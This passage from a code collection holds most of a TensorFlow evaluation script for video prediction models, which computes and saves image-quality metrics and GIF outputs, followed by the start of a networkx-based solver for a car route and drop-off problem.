os.makedirs(head)\n if overlaid_images is None:\n overlaid_images = [None] * len(images)\n if centers is None:\n centers = [None] * len(images)\n group_a, group_b, group_c, group_d = [], [], [], []\n for i, (images_, overlaid_images_, centers_) in enumerate(zip(images, overlaid_images, centers)):\n images_fname = '%s_%05d' % (prefix_fname, sample_start_ind + i)\n gif_images = save_image_sequence(images_fname, images_, overlaid_images_, centers_,\n radius=radius, alpha=alpha, time_start_ind=time_start_ind)\n gif_images = np.array(gif_images)\n #print(\"GIF IMAGES SHAPE: {}\".format(gif_images.shape))\n if not ensemble:\n gif_images = np.expand_dims(gif_images, 0)\n #import os.path\n numpy_name = '{}.npy'.format(prefix_fname)\n if not os.path.isfile(numpy_name):\n data = gif_images\n np.save(numpy_name, data)\n else:\n data = np.load(numpy_name)\n data = np.concatenate([data, gif_images], axis=0)\n np.save(numpy_name, data)\n #imageio.mimsave('{}.gif'.format(images_fname), gif_images)\n else:\n if i % 4 == 0:\n if len(group_a) == 0:\n group_a = gif_images\n else:\n group_a = np.concatenate([group_a, gif_images], axis=1)\n elif i % 4 == 1:\n if len(group_b) == 0:\n group_b = gif_images\n else:\n group_b = np.concatenate([group_b, gif_images], axis=1)\n elif i % 4 == 2:\n if len(group_c) == 0:\n group_c = gif_images\n else:\n group_c = np.concatenate([group_c, gif_images], axis=1)\n elif i % 4 == 3:\n if len(group_d) == 0:\n group_d = gif_images\n else:\n group_d = np.concatenate([group_d, gif_images], axis=1)\n if ensemble:\n for j, group in enumerate([group_a, group_b, group_c, group_d]):\n #imageio.mimsave('{0}_{1}_{2}_{3}.gif'.format(prefix_fname, sample_start_ind, j, i), group[i])\n # write the variance\n f = open(\"{}.txt\".format(prefix_fname), \"a+\")\n piece = group.shape[1] // 4\n enses = []\n for l in range(4):\n enses.append(group[:, l*piece:(l+1)*piece, :, :])\n # group is (x, 192, 64, 3)\n # enses is (4, x, 48, 64, 3)\n enses = np.array(enses)\n stds = np.std(enses, axis=0)\n stds = np.mean(stds, axis=(1, 2, 3))\n f.write(\"{0}_{1}: {2}\\n {3} \\n\\n\".format(sample_start_ind, j, stds, np.mean(stds)))\n f.close()\n imageio.mimsave('{0}_{1}_{2}.gif'.format(prefix_fname, sample_start_ind, j), group)\n #for i in range(len(group)):\n #imageio.mimsave('{0}_{1}_{2}_{3}.gif'.format(prefix_fname, sample_start_ind, j, i), group[i])\n #print(\"GIF IMAGES SHAPE AFTER: {}\".format(np.array(group[i]).shape))\n numpy_name = '{}.npy'.format(prefix_fname)\n stds = np.expand_dims(stds, 0)\n if not os.path.isfile(numpy_name):\n data = stds\n np.save(numpy_name, data)\n else:\n data = np.load(numpy_name)\n data = np.concatenate([data, stds], axis=0)\n np.save(numpy_name, data)\n\n\n\ndef save_metrics(prefix_fname, metrics, sample_start_ind=0):\n head, tail = os.path.split(prefix_fname)\n if head and not os.path.exists(head):\n os.makedirs(head)\n assert metrics.ndim == 2\n file_mode = 'w' if sample_start_ind == 0 else 'a'\n with open('%s.csv' % prefix_fname, file_mode, newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter='\\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n if sample_start_ind == 0:\n writer.writerow(map(str, ['sample_ind'] + list(range(metrics.shape[1])) + ['mean']))\n for i, metrics_row in enumerate(metrics):\n writer.writerow(map(str, [sample_start_ind + i] + list(metrics_row) + [np.mean(metrics_row)]))\n\n\ndef load_metrics(prefix_fname):\n with open('%s.csv' % prefix_fname, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t', quotechar='|')\n rows = 
list(reader)\n # skip header (first row), indices (first column), and means (last column)\n metrics = np.array(rows)[1:, 1:-1].astype(np.float32)\n return metrics\n\n\ndef merge_hparams(hparams0, hparams1):\n hparams0 = hparams0 or []\n hparams1 = hparams1 or []\n if not isinstance(hparams0, (list, tuple)):\n hparams0 = [hparams0]\n if not isinstance(hparams1, (list, tuple)):\n hparams1 = [hparams1]\n hparams = list(hparams0) + list(hparams1)\n # simplify into the content if possible\n if len(hparams) == 1:\n hparams, = hparams\n return hparams\n\n\ndef save_prediction_eval_results(task_dir, results, model_hparams, sample_start_ind=0, only_metrics=False, subtasks=None, ensemble=False):\n context_frames = model_hparams.context_frames\n context_images = results['images'][:, :context_frames]\n images = results['eval_images']\n metric_names = ['psnr', 'ssim', 'ssim_scikit', 'ssim_finn', 'vgg_csim']\n metric_fns = [metrics.peak_signal_to_noise_ratio_np,\n metrics.structural_similarity_np,\n metrics.structural_similarity_scikit_np,\n metrics.structural_similarity_finn_np,\n None]\n subtasks = subtasks or ['max']\n for metric_name, metric_fn in zip(metric_names, metric_fns):\n for subtask in subtasks:\n subtask_dir = task_dir + '_%s_%s' % (metric_name, subtask)\n gen_images = results.get('eval_gen_images_%s/%s' % (metric_name, subtask), results.get('eval_gen_images'))\n if metric_fn is not None: # recompute using numpy implementation\n metric = metric_fn(images, gen_images, keep_axis=(0, 1))\n else:\n metric = results['eval_%s/%s' % (metric_name, subtask)]\n save_metrics(os.path.join(subtask_dir, 'metrics', metric_name),\n metric, sample_start_ind=sample_start_ind)\n if only_metrics:\n continue\n\n save_image_sequences(os.path.join(subtask_dir, 'inputs', 'context_image'),\n context_images, sample_start_ind=sample_start_ind, ensemble=ensemble)\n save_image_sequences(os.path.join(subtask_dir, 'outputs', 'gen_image'),\n gen_images, sample_start_ind=sample_start_ind, ensemble=ensemble)\n\n\ndef save_prediction_results(task_dir, results, model_hparams, sample_start_ind=0, only_metrics=False):\n context_frames = model_hparams.context_frames\n sequence_length = model_hparams.sequence_length\n context_images, images = np.split(results['images'], [context_frames], axis=1)\n gen_images = results['gen_images'][:, context_frames - sequence_length:]\n psnr = metrics.peak_signal_to_noise_ratio_np(images, gen_images, keep_axis=(0, 1))\n mse = metrics.mean_squared_error_np(images, gen_images, keep_axis=(0, 1))\n ssim = metrics.structural_similarity_np(images, gen_images, keep_axis=(0, 1))\n save_metrics(os.path.join(task_dir, 'metrics', 'psnr'),\n psnr, sample_start_ind=sample_start_ind)\n save_metrics(os.path.join(task_dir, 'metrics', 'mse'),\n mse, sample_start_ind=sample_start_ind)\n save_metrics(os.path.join(task_dir, 'metrics', 'ssim'),\n ssim, sample_start_ind=sample_start_ind)\n if only_metrics:\n return\n\n save_image_sequences(os.path.join(task_dir, 'inputs', 'context_image'),\n context_images, sample_start_ind=sample_start_ind)\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_image'),\n gen_images, sample_start_ind=sample_start_ind)\n\n\ndef save_motion_results(task_dir, results, model_hparams, draw_center=False,\n sample_start_ind=0, only_metrics=False):\n context_frames = model_hparams.context_frames\n sequence_length = model_hparams.sequence_length\n pix_distribs = results['pix_distribs'][:, context_frames:]\n gen_pix_distribs = results['gen_pix_distribs'][:, context_frames - 
sequence_length:]\n pix_dist = metrics.expected_pixel_distance_np(pix_distribs, gen_pix_distribs, keep_axis=(0, 1))\n save_metrics(os.path.join(task_dir, 'metrics', 'pix_dist'),\n pix_dist, sample_start_ind=sample_start_ind)\n if only_metrics:\n return\n\n context_images, images = np.split(results['images'], [context_frames], axis=1)\n gen_images = results['gen_images'][:, context_frames - sequence_length:]\n initial_pix_distrib = results['pix_distribs'][:, 0:1]\n num_motions = pix_distribs.shape[-1]\n for i in range(num_motions):\n output_name_postfix = '%d' % i if num_motions > 1 else ''\n centers = compute_expectation_np(initial_pix_distrib[..., i:i + 1]) if draw_center else None\n save_image_sequences(os.path.join(task_dir, 'inputs', 'pix_distrib%s' % output_name_postfix),\n context_images[:, 0:1], initial_pix_distrib[..., i:i + 1], centers, sample_start_ind=sample_start_ind)\n centers = compute_expectation_np(gen_pix_distribs[..., i:i + 1]) if draw_center else None\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_pix_distrib%s' % output_name_postfix),\n gen_images, gen_pix_distribs[..., i:i + 1], centers, sample_start_ind=sample_start_ind)\n\n\ndef save_servo_results(task_dir, results, model_hparams, sample_start_ind=0, only_metrics=False):\n context_frames = model_hparams.context_frames\n sequence_length = model_hparams.sequence_length\n context_images, images = np.split(results['images'], [context_frames], axis=1)\n gen_images = results['gen_images'][:, context_frames - sequence_length:]\n goal_image = results['goal_image']\n # TODO: should exclude \"context\" actions assuming that they are passed in to the network\n actions = results['actions']\n gen_actions = results['gen_actions']\n goal_image_mse = metrics.mean_squared_error_np(goal_image, gen_images[:, -1], keep_axis=0)\n action_mse = metrics.mean_squared_error_np(actions, gen_actions, keep_axis=(0, 1))\n save_metrics(os.path.join(task_dir, 'metrics', 'goal_image_mse'),\n goal_image_mse[:, None], sample_start_ind=sample_start_ind)\n save_metrics(os.path.join(task_dir, 'metrics', 'action_mse'),\n action_mse, sample_start_ind=sample_start_ind)\n if only_metrics:\n return\n\n save_image_sequences(os.path.join(task_dir, 'inputs', 'context_image'),\n context_images, sample_start_ind=sample_start_ind)\n save_image_sequences(os.path.join(task_dir, 'inputs', 'goal_image'),\n goal_image[:, None], sample_start_ind=sample_start_ind)\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_image'),\n gen_images, sample_start_ind=sample_start_ind)\n gen_image_goal_diffs = np.abs(gen_images - goal_image[:, None])\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_image_goal_diff'),\n gen_image_goal_diffs, sample_start_ind=sample_start_ind)\n\n\ndef main():\n \"\"\"\n results_dir\n ├── output_dir # condition / method\n │ ├── prediction # task\n │ │ ├── inputs\n │ │ │ ├── context_image_00000_00.png # indexed by sample index and time step\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_image_00000_00.png # predicted images (only the ones in the loss)\n │ │ │ └── ...\n │ │ └── metrics\n │ │ ├── psnr.csv\n │ │ ├── mse.csv\n │ │ └── ssim.csv\n │ ├── prediction_eval_vgg_csim_max # task: best sample in terms of VGG cosine similarity\n │ │ ├── inputs\n │ │ │ ├── context_image_00000_00.png # indexed by sample index and time step\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_image_00000_00.png # predicted images (only the ones in the loss)\n │ │ │ └── ...\n │ │ └── metrics\n │ │ └── vgg_csim.csv\n │ ├── servo\n │ │ ├── 
inputs\n │ │ │ ├── context_image_00000_00.png\n │ │ │ ├── ...\n │ │ │ ├── goal_image_00000_00.png # only one goal image per sample\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_image_00000_00.png\n │ │ │ ├── ...\n │ │ │ ├── gen_image_goal_diff_00000_00.png\n │ │ │ └── ...\n │ │ └── metrics\n │ │ ├── action_mse.csv\n │ │ └── goal_image_mse.csv\n │ ├── motion\n │ │ ├── inputs\n │ │ │ ├── pix_distrib_00000_00.png\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_pix_distrib_00000_00.png\n │ │ │ ├── ...\n │ │ │ ├── gen_pix_distrib_overlaid_00000_00.png\n │ │ │ └── ...\n │ │ └── metrics\n │ │ └── pix_dist.csv\n │ └── ...\n └── ...\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, required=True, help=\"either a directory containing subdirectories \"\n \"train, val, test, etc, or a directory containing \"\n \"the tfrecords\")\n parser.add_argument(\"--results_dir\", type=str, default='results', help=\"ignored if output_dir is specified\")\n parser.add_argument(\"--output_dir\", help=\"output directory where results are saved. default is results_dir/model_fname, \"\n \"where model_fname is the directory name of checkpoint\")\n parser.add_argument(\"--checkpoint\", help=\"directory with checkpoint or checkpoint name (e.g. checkpoint_dir/model-200000)\")\n\n parser.add_argument(\"--mode\", type=str, choices=['val', 'test'], default='val', help='mode for dataset, val or test.')\n\n parser.add_argument(\"--dataset\", type=str, help=\"dataset class name\")\n parser.add_argument(\"--dataset_hparams\", type=str, help=\"a string of comma separated list of dataset hyperparameters\")\n parser.add_argument(\"--model\", type=str, help=\"model class name\")\n parser.add_argument(\"--model_hparams\", type=str, help=\"a string of comma separated list of model hyperparameters\")\n\n parser.add_argument(\"--batch_size\", type=int, default=8, help=\"number of samples in batch\")\n parser.add_argument(\"--num_samples\", type=int, help=\"number of samples in total (all of them by default)\")\n parser.add_argument(\"--num_epochs\", type=int, default=1)\n\n parser.add_argument(\"--tasks\", type=str, nargs='+', help='tasks to evaluate (e.g. prediction, prediction_eval, servo, motion)')\n parser.add_argument(\"--eval_substasks\", type=str, nargs='+', default=['max', 'min'], help='subtasks to evaluate (e.g. max, avg, min). 
only applicable to prediction_eval')\n parser.add_argument(\"--only_metrics\", action='store_true')\n parser.add_argument(\"--num_stochastic_samples\", type=int, default=100)\n\n parser.add_argument(\"--gt_inputs_dir\", type=str, help=\"directory containing input ground truth images for ismple dataset\")\n parser.add_argument(\"--gt_outputs_dir\", type=str, help=\"directory containing output ground truth images for ismple dataset\")\n\n parser.add_argument(\"--eval_parallel_iterations\", type=int, default=10)\n parser.add_argument(\"--gpu_mem_frac\", type=float, default=0, help=\"fraction of gpu memory to use\")\n parser.add_argument(\"--seed\", type=int, default=7)\n\n parser.add_argument(\"--ensemble\", action='store_true')\n\n args = parser.parse_args()\n\n if args.seed is not None:\n tf.set_random_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n\n dataset_hparams_dict = {}\n model_hparams_dict = {}\n if args.checkpoint:\n checkpoint_dir = os.path.normpath(args.checkpoint)\n if not os.path.exists(checkpoint_dir):\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), checkpoint_dir)\n if not os.path.isdir(args.checkpoint):\n checkpoint_dir, _ = os.path.split(checkpoint_dir)\n with open(os.path.join(checkpoint_dir, \"options.json\")) as f:\n print(\"loading options from checkpoint %s\" % args.checkpoint)\n options = json.loads(f.read())\n args.dataset = args.dataset or options['dataset']\n args.model = args.model or options['model']\n try:\n with open(os.path.join(checkpoint_dir, \"dataset_hparams.json\")) as f:\n dataset_hparams_dict = json.loads(f.read())\n except FileNotFoundError:\n print(\"dataset_hparams.json was not loaded because it does not exist\")\n try:\n with open(os.path.join(checkpoint_dir, \"model_hparams.json\")) as f:\n model_hparams_dict = json.loads(f.read())\n model_hparams_dict.pop('num_gpus', None) # backwards-compatibility\n except FileNotFoundError:\n print(\"model_hparams.json was not loaded because it does not exist\")\n args.output_dir = args.output_dir or os.path.join(args.results_dir, os.path.split(checkpoint_dir)[1])\n else:\n if not args.dataset:\n raise ValueError('dataset is required when checkpoint is not specified')\n if not args.model:\n raise ValueError('model is required when checkpoint is not specified')\n args.output_dir = args.output_dir or os.path.join(args.results_dir, 'model.%s' % args.model)\n\n print('----------------------------------- Options ------------------------------------')\n for k, v in args._get_kwargs():\n print(k, \"=\", v)\n print('------------------------------------- End --------------------------------------')\n\n VideoDataset = datasets.get_dataset_class(args.dataset)\n dataset = VideoDataset(args.input_dir, mode=args.mode, num_epochs=args.num_epochs, seed=args.seed,\n hparams_dict=dataset_hparams_dict, hparams=args.dataset_hparams)\n\n def override_hparams_dict(dataset):\n hparams_dict = dict(model_hparams_dict)\n hparams_dict['context_frames'] = dataset.hparams.context_frames\n hparams_dict['sequence_length'] = dataset.hparams.sequence_length\n hparams_dict['repeat'] = dataset.hparams.time_shift\n return hparams_dict\n\n VideoPredictionModel = models.get_model_class(args.model)\n model = VideoPredictionModel(mode='test', hparams_dict=override_hparams_dict(dataset), hparams=args.model_hparams,\n eval_num_samples=args.num_stochastic_samples, eval_parallel_iterations=args.eval_parallel_iterations)\n context_frames = model.hparams.context_frames\n sequence_length = 
model.hparams.sequence_length\n\n if args.num_samples:\n if args.num_samples > dataset.num_examples_per_epoch():\n raise ValueError('num_samples cannot be larger than the dataset')\n num_examples_per_epoch = args.num_samples\n else:\n num_examples_per_epoch = dataset.num_examples_per_epoch()\n # if num_examples_per_epoch % args.batch_size != 0:\n # raise ValueError('batch_size should evenly divide the dataset')\n if args.ensemble:\n assert args.batch_size % model.num_ensembles == 0, \"batchsize should be evenly divided by num_ensembles\"\n inputs, target = dataset.make_batch(args.batch_size // model.num_ensembles)\n else:\n inputs, target = dataset.make_batch(args.batch_size)\n\n if not isinstance(model, models.GroundTruthVideoPredictionModel):\n # remove ground truth data past context_frames to prevent accidentally using it\n for k, v in inputs.items():\n if k != 'actions':\n inputs[k] = v[:, :context_frames]\n\n if args.ensemble:\n for k, v in inputs.items():\n tiling = [1 for _ in range(len(v.shape))]\n tiling[0] = model.num_ensembles\n inputs[k] = tf.tile(v, tiling)\n \n tiling = [1 for _ in range(len(target.shape))]\n tiling[0] = model.num_ensembles\n target = tf.tile(target, tiling)\n \n \n input_phs = {k: tf.placeholder(v.dtype, v.shape, '%s_ph' % k) for k, v in inputs.items()}\n target_ph = tf.placeholder(target.dtype, target.shape, 'targets_ph')\n\n with tf.variable_scope(''):\n model.build_graph(input_phs, target_ph)\n\n tasks = args.tasks\n if tasks is None:\n tasks = ['prediction_eval']\n if 'pix_distribs' in inputs:\n tasks.append('motion')\n\n if 'servo' in tasks:\n servo_model = VideoPredictionModel(mode='test', hparams_dict=model_hparams_dict, hparams=args.model_hparams)\n cem_batch_size = 200\n plan_horizon = sequence_length - 1\n image_shape = inputs['images'].shape.as_list()[2:]\n state_shape = inputs['states'].shape.as_list()[2:]\n action_shape = inputs['actions'].shape.as_list()[2:]\n servo_input_phs = {\n 'images': tf.placeholder(tf.float32, shape=[cem_batch_size, context_frames] + image_shape),\n 'states': tf.placeholder(tf.float32, shape=[cem_batch_size, 1] + state_shape),\n 'actions': tf.placeholder(tf.float32, shape=[cem_batch_size, plan_horizon] + action_shape),\n }\n if isinstance(servo_model, models.GroundTruthVideoPredictionModel):\n images_shape = inputs['images'].shape.as_list()[1:]\n servo_input_phs['images'] = tf.placeholder(tf.float32, shape=[cem_batch_size] + images_shape)\n with tf.variable_scope('', reuse=True):\n servo_model.build_graph(servo_input_phs)\n\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n with open(os.path.join(output_dir, \"options.json\"), \"w\") as f:\n f.write(json.dumps(vars(args), sort_keys=True, indent=4))\n with open(os.path.join(output_dir, \"dataset_hparams.json\"), \"w\") as f:\n f.write(json.dumps(dataset.hparams.values(), sort_keys=True, indent=4))\n with open(os.path.join(output_dir, \"model_hparams.json\"), \"w\") as f:\n f.write(json.dumps(model.hparams.values(), sort_keys=True, indent=4))\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_mem_frac)\n config = tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True)\n sess = tf.Session(config=config)\n\n model.restore(sess, args.checkpoint)\n\n if 'servo' in tasks:\n servo_policy = ServoPolicy(servo_model, sess)\n\n sample_ind = 0\n while True:\n if args.num_samples and sample_ind >= args.num_samples:\n break\n try:\n input_results, target_result = sess.run([inputs, target])\n except 
tf.errors.OutOfRangeError:\n break\n print(\"evaluation samples from %d to %d\" % (sample_ind, sample_ind + args.batch_size))\n\n if 'prediction_eval' in tasks:\n feed_dict = {input_ph: input_results[name] for name, input_ph in input_phs.items()}\n feed_dict.update({target_ph: target_result})\n # compute \"best\" metrics using the computation graph (if available) or explicitly with python logic\n if model.eval_outputs and model.eval_metrics:\n fetches = {'images': model.inputs['images']}\n fetches.update(model.eval_outputs.items())\n fetches.update(model.eval_metrics.items())\n results = sess.run(fetches, feed_dict=feed_dict)\n else:\n metric_names = ['psnr', 'ssim', 'ssim_scikit', 'ssim_finn', 'vgg_csim']\n metric_fns = [metrics.peak_signal_to_noise_ratio_np,\n metrics.structural_similarity_np,\n metrics.structural_similarity_scikit_np,\n metrics.structural_similarity_finn_np,\n metrics.vgg_cosine_similarity_np]\n\n all_gen_images = []\n all_metrics = [np.empty((args.num_stochastic_samples, args.batch_size, sequence_length - context_frames)) for _ in metric_names]\n for s in range(args.num_stochastic_samples):\n gen_images = sess.run(model.outputs['gen_images'], feed_dict=feed_dict)\n all_gen_images.append(gen_images)\n for metric_name, metric_fn, all_metric in zip(metric_names, metric_fns, all_metrics):\n metric = metric_fn(gen_images, target_result, keep_axis=(0, 1))\n all_metric[s] = metric\n\n results = {}\n for metric_name, all_metric in zip(metric_names, all_metrics):\n for subtask in args.eval_substasks:\n results['eval_gen_images_%s/%s' % (metric_name, subtask)] = np.empty_like(all_gen_images[0])\n results['eval_%s/%s' % (metric_name, subtask)] = np.empty_like(all_metric[0])\n\n for i in range(args.batch_size):\n for metric_name, all_metric in zip(metric_names, all_metrics):\n ordered = np.argsort(np.mean(all_metric, axis=-1)[:, i]) # mean over time and sort over samples\n for subtask in args.eval_substasks:\n if subtask == 'max':\n sidx = ordered[-1]\n elif subtask == 'min':\n sidx = ordered[0]\n else:\n raise NotImplementedError\n results['eval_gen_images_%s/%s' % (metric_name, subtask)][i] = all_gen_images[sidx][i]\n results['eval_%s/%s' % (metric_name, subtask)][i] = all_metric[sidx][i]\n # CHANGE THE BELOW STUFF INTO A GIF IF ARGS IS IN ENSEMBLE\n save_prediction_eval_results(os.path.join(output_dir, 'prediction_eval'),\n results, model.hparams, sample_ind, args.only_metrics, args.eval_substasks, ensemble=args.ensemble)\n\n if 'prediction' in tasks or 'motion' in tasks: # do these together\n feed_dict = {input_ph: input_results[name] for name, input_ph in input_phs.items()}\n fetches = {'images': model.inputs['images'],\n 'gen_images': model.outputs['gen_images']}\n if 'motion' in tasks:\n fetches.update({'pix_distribs': model.inputs['pix_distribs'],\n 'gen_pix_distribs': model.outputs['gen_pix_distribs']})\n\n if args.num_stochastic_samples:\n all_results = [sess.run(fetches, feed_dict=feed_dict) for _ in range(args.num_stochastic_samples)]\n all_results = nest.map_structure(lambda *x: np.stack(x), *all_results)\n all_context_images, all_images = np.split(all_results['images'], [context_frames], axis=2)\n all_gen_images = all_results['gen_images'][:, :, context_frames - sequence_length:]\n all_mse = metrics.mean_squared_error_np(all_images, all_gen_images, keep_axis=(0, 1))\n all_mse_argsort = np.argsort(all_mse, axis=0)\n\n for subtask, argsort_ind in zip(['_best', '_median', '_worst'],\n [0, args.num_stochastic_samples // 2, -1]):\n all_mse_inds = 
all_mse_argsort[argsort_ind]\n gather = lambda x: np.array([x[ind, sample_ind] for sample_ind, ind in enumerate(all_mse_inds)])\n results = nest.map_structure(gather, all_results)\n if 'prediction' in tasks:\n save_prediction_results(os.path.join(output_dir, 'prediction' + subtask),\n results, model.hparams, sample_ind, args.only_metrics)\n if 'motion' in tasks:\n draw_center = isinstance(model, models.NonTrainableVideoPredictionModel)\n save_motion_results(os.path.join(output_dir, 'motion' + subtask),\n results, model.hparams, draw_center, sample_ind, args.only_metrics)\n else:\n results = sess.run(fetches, feed_dict=feed_dict)\n if 'prediction' in tasks:\n save_prediction_results(os.path.join(output_dir, 'prediction'),\n results, model.hparams, sample_ind, args.only_metrics)\n if 'motion' in tasks:\n draw_center = isinstance(model, models.NonTrainableVideoPredictionModel)\n save_motion_results(os.path.join(output_dir, 'motion'),\n results, model.hparams, draw_center, sample_ind, args.only_metrics)\n\n if 'servo' in tasks:\n images = input_results['images']\n states = input_results['states']\n gen_actions = []\n gen_images = []\n for images_, states_ in zip(images, states):\n obs = {'context_images': images_[:context_frames],\n 'context_state': states_[0],\n 'goal_image': images_[-1]}\n if isinstance(servo_model, models.GroundTruthVideoPredictionModel):\n obs['context_images'] = images_\n gen_actions_, gen_images_ = servo_policy.act(obs, servo_model.outputs['gen_images'])\n gen_actions.append(gen_actions_)\n gen_images.append(gen_images_)\n gen_actions = np.stack(gen_actions)\n gen_images = np.stack(gen_images)\n results = {'images': input_results['images'],\n 'actions': input_results['actions'],\n 'goal_image': input_results['images'][:, -1],\n 'gen_actions': gen_actions,\n 'gen_images': gen_images}\n save_servo_results(os.path.join(output_dir, 'servo'),\n results, servo_model.hparams, sample_ind, args.only_metrics)\n\n sample_ind += args.batch_size\n\n metric_fnames = []\n if 'prediction_eval' in tasks:\n metric_names = ['psnr', 'ssim', 'ssim_finn', 'vgg_csim']\n subtasks = ['max']\n for metric_name in metric_names:\n for subtask in subtasks:\n metric_fnames.append(\n os.path.join(output_dir, 'prediction_eval_%s_%s' % (metric_name, subtask), 'metrics', metric_name))\n if 'prediction' in tasks:\n subtask = '_best' if args.num_stochastic_samples else ''\n metric_fnames.extend([\n os.path.join(output_dir, 'prediction' + subtask, 'metrics', 'psnr'),\n os.path.join(output_dir, 'prediction' + subtask, 'metrics', 'mse'),\n os.path.join(output_dir, 'prediction' + subtask, 'metrics', 'ssim'),\n ])\n if 'motion' in tasks:\n subtask = '_best' if args.num_stochastic_samples else ''\n metric_fnames.append(os.path.join(output_dir, 'motion' + subtask, 'metrics', 'pix_dist'))\n if 'servo' in tasks:\n metric_fnames.append(os.path.join(output_dir, 'servo', 'metrics', 'goal_image_mse'))\n metric_fnames.append(os.path.join(output_dir, 'servo', 'metrics', 'action_mse'))\n\n for metric_fname in metric_fnames:\n task_name, _, metric_name = metric_fname.split('/')[-3:]\n metric = load_metrics(metric_fname)\n print('=' * 31)\n print(task_name, metric_name)\n print('-' * 31)\n metric_header_format = '{:>10} {:>20}'\n metric_row_format = '{:>10} {:>10.4f} ({:>7.4f})'\n print(metric_header_format.format('time step', os.path.split(metric_fname)[1]))\n for t, (metric_mean, metric_std) in enumerate(zip(metric.mean(axis=0), metric.std(axis=0))):\n print(metric_row_format.format(t, metric_mean, metric_std))\n 
print(metric_row_format.format('mean (std)', metric.mean(), metric.std()))\n print('=' * 31)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":36621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
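The per-batch-element "best/min" bookkeeping in evaluate.py reduces to an argsort over time-averaged metrics across stochastic samples; here is a tiny self-contained NumPy illustration of just that selection step (synthetic numbers, not the script's real tensors):

# Toy version of the sample-selection logic: all_metric has shape
# (num_stochastic_samples, batch_size, time); for each batch element we
# order samples by their mean-over-time score and pick the extremes.
import numpy as np

num_samples, batch_size, T = 5, 2, 3
rng = np.random.default_rng(0)
all_metric = rng.random((num_samples, batch_size, T))

order = np.argsort(all_metric.mean(axis=-1), axis=0)  # shape (num_samples, batch_size)
for i in range(batch_size):
    best, worst = order[-1, i], order[0, i]
    print('batch element %d: best sample %d, worst sample %d' % (i, best, worst))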
+{"seq_id":"242146296","text":"import os\nimport sys\nsys.path.append('..')\nsys.path.append('../..')\nimport argparse\nimport utils\nimport graph_maker\nimport student_utils\nimport clustering_approach\nimport graphModifier\nimport practiceSolver\n\nfrom student_utils import *\n\"\"\"\n======================================================================\n Complete the following function.\n======================================================================\n\"\"\"\n\nclass Node:\n\n def __init__(self, name, position, parent):\n self.name = name\n self.position = position\n self.parent = parent\n\n\ndef solve(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix, params=[]):\n \"\"\"\n Write your algorithm here.\n Input:\n list_of_locations: A list of locations such that node i of the graph corresponds to name at index i of the list\n list_of_homes: A list of homes\n starting_car_location: The name of the starting location for the car\n adjacency_matrix: The adjacency matrix from the input file\n Output:\n A list of locations representing the car path\n A dictionary mapping drop-off location to a list of homes of TAs that got off at that particular location\n NOTE: both outputs should be in terms of indices not the names of the locations themselves\n \"\"\"\n\n \"\"\"list_of_locations, list_of_homes_int, starting_car_location, \\\n adjacency_matrix = preProcess(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\"\"\"\n\n\n if len(list_of_locations) == 0:\n return [], {}\n\n #Do not delete next line\n # graphModifier.graphClusterer(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\n location_dict = {}\n car_start_int = 0\n\n\n list_of_homes_int = []\n list_of_locations_int = [_ for _ in range(len(list_of_locations))]\n for j in range(len(list_of_locations)):\n location_dict[j] = list_of_locations[j]\n if list_of_locations[j] == starting_car_location:\n car_start_int = j\n for _ in list_of_homes:\n if _ == list_of_locations[j]:\n list_of_homes_int += [j]\n\n\n #preProcess(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n B = clusterGraph(list_of_locations_int, list_of_homes_int, car_start_int, G)\n returner = practiceSolver.tspRepeats(B, car_start_int)\n if len(returner) == 0:\n returner = [car_start_int]\n\n finalList = [returner[0]]\n for i in range(len(returner)-1):\n finalList += nx.shortest_path(G, returner[i], returner[i+1], weight='weight')[1:]\n finalList += nx.shortest_path(G, returner[-1], returner[0], weight='weight')[1:]\n\n all_distances = dict(nx.floyd_warshall(G))\n returnMapping = {}\n for i in list_of_homes_int:\n minDist = float('inf')\n home_map = 999\n for j in finalList:\n if all_distances[i][j] < minDist:\n minDist = all_distances[i][j]\n home_map = j\n if home_map != 999:\n if not home_map in returnMapping:\n returnMapping[home_map] = [i]\n else:\n returnMapping[home_map] = returnMapping[home_map] + [i]\n\n #clustering_approach.visualize_communities_and_dropoffs(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\n returnList = []\n for i in finalList:\n returnList.append(location_dict[i])\n\n print(cost_of_solution(G, [int(_) for _ in finalList], returnMapping)[0])\n return [int(_) for _ in finalList], returnMapping\n\n\ndef clusterGraph(list_of_locations_int, list_of_homes_int, car_start_int, G):\n #G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n B = 
